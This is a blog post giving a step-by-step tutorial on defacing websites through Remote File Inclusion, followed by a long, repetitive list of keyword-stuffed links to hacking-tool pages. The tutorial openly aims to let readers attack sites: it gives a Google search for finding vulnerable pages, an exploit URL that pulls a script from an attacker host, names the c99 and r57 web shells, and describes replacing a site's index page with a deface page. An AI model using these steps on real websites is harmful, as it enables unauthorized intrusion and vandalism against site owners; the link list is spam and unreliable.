sexta-feira, 21 de agosto de 2020

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Continue reading
  1. Hacker Tools Free
  2. New Hacker Tools
  3. Free Pentest Tools For Windows
  4. Hacking Tools For Kali Linux
  5. Hacking Tools Software
  6. Hacker Tools Software
  7. Pentest Tools Alternative
  8. Pentest Tools Kali Linux
  9. Hacker Tools Hardware
  10. Hak5 Tools
  11. Pentest Tools For Android
  12. Pentest Tools Website
  13. Pentest Box Tools Download
  14. Hack Tools For Windows
  15. Hacking Tools Free Download
  16. Hacker Tools 2019
  17. Hacking Tools Mac
  18. Hak5 Tools
  19. Hacking Tools Usb
  20. Hacking Tools Download
  21. Black Hat Hacker Tools
  22. Termux Hacking Tools 2019
  23. Hacking Tools Windows 10
  24. Pentest Tools Nmap
  25. Pentest Tools Subdomain
  26. Hack Website Online Tool
  27. Pentest Tools Apk
  28. Pentest Tools Download
  29. Pentest Tools Open Source
  30. Pentest Tools Url Fuzzer
  31. Hacker Tools Free
  32. Pentest Tools
  33. Blackhat Hacker Tools
  34. Hack Tools
  35. Hacker Tools Mac
  36. Pentest Tools Review
  37. Hacking Tools Kit
  38. Pentest Tools For Mac
  39. Hack Website Online Tool
  40. Pentest Recon Tools
  41. Tools For Hacker
  42. Pentest Tools Nmap
  43. Pentest Tools Apk
  44. Hack Tools Github
  45. Github Hacking Tools
  46. Nsa Hack Tools Download
  47. Hacker Tools
  48. Hacking Tools Kit
  49. Hack Website Online Tool
  50. Hacker Hardware Tools
  51. Hack Tools Online
  52. Hacking Apps
  53. Tools For Hacker
  54. Hacker Tools Free
  55. Termux Hacking Tools 2019
  56. Hacking Tools Pc
  57. Hackers Toolbox
  58. Hacking Tools Kit
  59. Hacking Tools Software
  60. Underground Hacker Sites
  61. Hackers Toolbox
  62. Hacking Tools For Windows
  63. Hacking Tools For Kali Linux
  64. Hacker Hardware Tools
  65. Hacking Apps
  66. Pentest Tools Open Source
  67. Hack App
  68. Hacking Tools Pc
  69. Hack App
  70. Pentest Tools List
  71. Install Pentest Tools Ubuntu
  72. Hacking Tools Free Download
  73. Hack App
  74. Hacker Search Tools
  75. Hacker Tools Mac
  76. Hacking Tools
  77. Pentest Automation Tools
  78. Easy Hack Tools
  79. What Are Hacking Tools
  80. How To Make Hacking Tools
  81. Hacker Techniques Tools And Incident Handling
  82. What Is Hacking Tools
  83. Hacking Tools For Kali Linux
  84. Nsa Hacker Tools
  85. Physical Pentest Tools
  86. New Hack Tools
  87. Hacker Tool Kit
  88. Hack Website Online Tool
  89. Pentest Tools Bluekeep
  90. Hacking Tools For Windows Free Download
  91. New Hack Tools
  92. Tools 4 Hack
  93. Hacking Tools Download
  94. Nsa Hack Tools Download
  95. Pentest Tools Linux
  96. Hacking Tools Windows
  97. Android Hack Tools Github
  98. Install Pentest Tools Ubuntu
  99. How To Hack
  100. Hack Tools Github
  101. Hack Tools Download
  102. Tools For Hacker
  103. Tools 4 Hack
  104. Hacker Security Tools
  105. Pentest Tools Open Source
  106. Underground Hacker Sites
  107. Hacks And Tools
  108. Hacking Tools For Windows Free Download
  109. Hacker Tools Free
  110. Pentest Tools Download
  111. Pentest Tools Framework
  112. Best Pentesting Tools 2018
  113. Nsa Hacker Tools
Publicada por à(s)

Sem comentários:

Enviar um comentário

Subscrever: Enviar feedback (Atom)